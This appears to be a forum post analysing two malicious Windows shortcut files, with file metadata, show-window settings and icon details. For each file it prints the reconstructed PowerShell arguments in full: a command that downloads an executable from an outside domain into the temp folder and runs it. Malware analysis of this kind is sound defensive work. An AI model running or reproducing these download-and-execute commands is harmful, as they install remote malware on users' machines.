Analysis for file 7f5a*.lnk
Type of file: lnkfile [Magic Number: 4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 00 00 00 46]
Creation Date: Sun, 25 Oct 2015 20:40:10 GMT
Last Modified Date: Sun, 25 Oct 2015 20:40:10 GMT
Comments:
The shortcut link tries to open powershell at the location C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe and pass arguments to it to download a file and save it in the temp folder as a.exe and followed by running the newly saved application. The file tries to download a file from the url hxxp :// goodvin77787.in/bot . exe, now taking into consideration the extension, it appears to be a PE file but this cannot be stressed. Upon examination using a hex editor, the arguments passed can be reconstructed as follows:-
(new-object System.Net.WebClient).DownloadFile('http://goodvin77787.in/bot.exe','%TEMP%\a.exe');Start-Process "%TEMP%\a.exe
Moreover the process window show command value was found to be: SW_SHOWMINNOACTIVE, which means the process will be started as a minimized window but will be active. The process a.exe is iconified and the icon is taken from SHELL32.DLL, and the Icon index being 54 and the dimension being 24x24.
Analysis for file 55e8*.lnk
Type of file: lnkfile [Magic Number: 4C 00 00 00 01 14 02 00 00 00 00 00 C0 00 00 00 00 00 00 46]
Creation Date: Thu, 29 Oct 2015 04:37:08 GMT
Last Modified Date: Thu, 29 Oct 2015 04:37:08 GMT
Comments:
The shortcut link tries to open powershell at the location C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe and pass arguments to it to download a file and save it in the temp folder as z.exe and followed by running the newly saved application. The file tries to download a file from the url hxxp :// goodprice28.pw/bot . exe, now taking into consideration the extension, it appears to be a PE file but this cannot be stressed. Upon examination using a hex editor, the arguments passed can be reconstructed as follows:-
(new-object System.Net.WebClient).DownloadFile('http://goodprice28.pw/bot.exe','%TEMP%\z.exe');Start-Process "%TEMP%\z.exe
Moreover the process window show command value was found to be: SW_SHOWMINNOACTIVE, which means the process will be started as a minimized window but will be active. The process z.exe is iconified and the icon is taken from SHELL32.DLL, and the Icon index being 70 and the dimension being 24x24.
I am not writing any specific conclusion since I am not able to directly examine the bot.exe files and see their effect. I hope this much is fine. Let me know where I messed up, I wold also like to know if anything specific can be deduced from SID that is present in both files.
Edit: Made malicious links unclickable -Deque
